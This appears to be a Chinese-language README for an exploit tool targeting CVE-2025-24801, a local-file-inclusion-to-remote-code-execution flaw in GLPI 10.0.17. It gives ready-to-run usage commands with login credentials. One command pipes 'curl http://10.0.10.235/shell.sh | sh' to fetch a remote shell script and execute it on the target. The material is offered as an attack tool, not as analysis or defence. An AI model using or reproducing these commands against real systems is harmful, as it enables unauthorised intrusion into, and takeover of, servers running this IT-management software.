此漏洞利用程序使用CVE-2025-24801通过本地文件包含(LFI)在GLPI 10.0.17上实现远程代码执行(RCE)。该CVE的概念验证(PoC)提供了对此GLPI漏洞的解释。
某些应用暴露了/glpi/端点(例如,http://172.16.11.130:8080/glpi/front/computer.form.php)。如果目标应用包含此端点,则需要将其添加到`--url`参数中(例如,`--url http://172.16.11.130:8080/glpi`)。
使用示例。
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
如果你已经执行了此漏洞利用并触发了RCE,可以使用--cmd 参数来仅执行命令。
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"